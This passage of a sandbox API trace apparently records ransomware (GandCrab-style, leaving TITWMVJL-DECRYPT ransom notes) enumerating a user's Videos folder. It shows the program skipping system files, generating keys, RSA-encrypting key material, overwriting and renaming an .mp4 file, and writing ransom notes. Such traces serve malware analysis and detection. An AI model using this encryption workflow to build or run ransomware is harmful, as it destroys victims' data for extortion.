lpString2="..") returned 1 [0095.868] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\d2ca4a09d2ca4deb61a.lock" [0095.868] lstrlenW (lpString=".titwmvjl") returned 9 [0095.868] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\d2ca4a09d2ca4deb61a.lock") returned 119 [0095.868] VirtualAlloc (lpAddress=0x0, dwSize=0x12e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.868] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 128 [0095.869] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\d2ca4a09d2ca4deb61a.lock") returned 119 [0095.869] lstrlenW (lpString=".lock") returned 5 [0095.869] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.869] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0095.869] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.869] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.869] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0095.869] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0095.869] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0095.869] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\TITWMVJL-DECRYPT.txt" [0095.869] lstrlenW (lpString=".titwmvjl") returned 9 [0095.869] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\TITWMVJL-DECRYPT.txt") returned 115 [0095.869] VirtualAlloc (lpAddress=0x0, dwSize=0x126, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.869] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 124 [0095.870] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\TITWMVJL-DECRYPT.txt") returned 115 [0095.870] lstrlenW (lpString=".txt") returned 4 [0095.870] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.870] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0095.870] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0095.870] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.870] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\TITWMVJL-DECRYPT.txt") returned 115 [0095.870] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\TITWMVJL-DECRYPT.txt") returned 115 [0095.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0095.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0095.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0095.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0095.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0095.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0095.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0095.870] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0095.870] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.870] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0095.870] FindClose (in: hFindFile=0x5032f8 | out: hFindFile=0x5032f8) returned 1 [0095.872] CloseHandle (hObject=0x2c4) returned 1 [0095.872] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.872] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0095.872] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0095.872] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\TITWMVJL-DECRYPT.txt" [0095.872] lstrlenW (lpString=".titwmvjl") returned 9 [0095.872] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\TITWMVJL-DECRYPT.txt") returned 98 [0095.872] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.872] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 107 [0095.872] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\TITWMVJL-DECRYPT.txt") returned 98 [0095.872] lstrlenW (lpString=".txt") returned 4 [0095.872] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.872] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0095.872] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0095.872] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.872] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\TITWMVJL-DECRYPT.txt") returned 98 [0095.872] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\TITWMVJL-DECRYPT.txt") returned 98 [0095.872] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0095.873] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0095.873] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0095.873] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0095.873] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0095.873] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0095.873] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0095.873] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0095.873] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.873] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0095.873] FindClose (in: hFindFile=0x503278 | out: hFindFile=0x503278) returned 1 [0095.873] CloseHandle (hObject=0x2bc) returned 1 [0095.873] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0095.873] lstrcmpW (lpString1="nBDgucKgi.mp4", lpString2=".") returned 1 [0095.873] lstrcmpW (lpString1="nBDgucKgi.mp4", lpString2="..") returned 1 [0095.873] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\", lpString2="nBDgucKgi.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\nBDgucKgi.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\nBDgucKgi.mp4" [0095.873] lstrlenW (lpString=".titwmvjl") returned 9 [0095.873] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\nBDgucKgi.mp4") returned 75 [0095.873] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.874] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\nBDgucKgi.mp4.titwmvjl") returned 84 [0095.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\nBDgucKgi.mp4") returned 75 [0095.874] lstrlenW (lpString=".mp4") returned 4 [0095.874] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.874] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp4 ") returned 5 [0095.874] lstrcmpiW (lpString1=".mp4", lpString2=".titwmvjl") returned -1 [0095.874] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\nBDgucKgi.mp4") returned 75 [0095.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\nBDgucKgi.mp4") returned 75 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="desktop.ini") returned 1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="autorun.inf") returned 1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="ntuser.dat") returned -1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="iconcache.db") returned 1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="bootsect.bak") returned 1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="boot.ini") returned 1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="ntuser.dat.log") returned -1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="thumbs.db") returned -1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="KRAB-DECRYPT.html") returned 1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="CRAB-DECRYPT.html") returned 1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="KRAB-DECRYPT.txt") returned 1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="ntldr") returned -1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="NTDETECT.COM") returned -1 [0095.874] lstrcmpiW (lpString1="nBDgucKgi.mp4", lpString2="Bootfont.bin") returned 1 [0095.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\nBDgucKgi.mp4") returned 75 [0095.875] lstrlenW (lpString=".mp4") returned 4 [0095.875] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.875] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0095.875] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.875] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.875] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\nBDgucKgi.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\nbdguckgi.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0095.875] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.875] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0095.876] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.876] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.876] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0095.877] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.877] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.877] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.877] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0095.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.877] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.877] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.877] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0095.878] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.878] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.878] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.878] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0095.878] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.878] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.878] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.878] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.879] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0095.879] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.879] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503778) returned 1 [0095.879] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.879] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0095.879] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.879] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0095.880] GetLastError () returned 0x0 [0095.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.880] CryptDestroyKey (hKey=0x503778) returned 1 [0095.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.880] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.880] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0095.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.880] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503278) returned 1 [0095.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.881] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0095.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.881] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0095.881] GetLastError () returned 0x0 [0095.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.881] CryptDestroyKey (hKey=0x503278) returned 1 [0095.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.881] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.881] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.882] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.882] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0xe25a, lpOverlapped=0x0) returned 1 [0095.893] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xffff1da6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.893] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe25a, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0xe25a, lpOverlapped=0x0) returned 1 [0095.895] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.895] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0095.896] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.899] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.900] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.900] CloseHandle (hObject=0x2bc) returned 1 [0095.903] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\nBDgucKgi.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\nbdguckgi.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\nBDgucKgi.mp4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\nbdguckgi.mp4.titwmvjl"), dwFlags=0x1) returned 1 [0095.903] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.903] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0095.903] lstrcmpW (lpString1="pT-rl7dzeiGs9hwF4kXK", lpString2=".") returned 1 [0095.904] lstrcmpW (lpString1="pT-rl7dzeiGs9hwF4kXK", lpString2="..") returned 1 [0095.904] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\", lpString2="pT-rl7dzeiGs9hwF4kXK" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK" [0095.904] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\" [0095.904] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.904] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.904] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.904] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.904] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.904] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.904] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.904] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.905] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.905] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.905] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.905] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\\\TITWMVJL-DECRYPT.txt") returned 104 [0095.905] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\pt-rl7dzeigs9hwf4kxk\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0095.905] lstrlenW 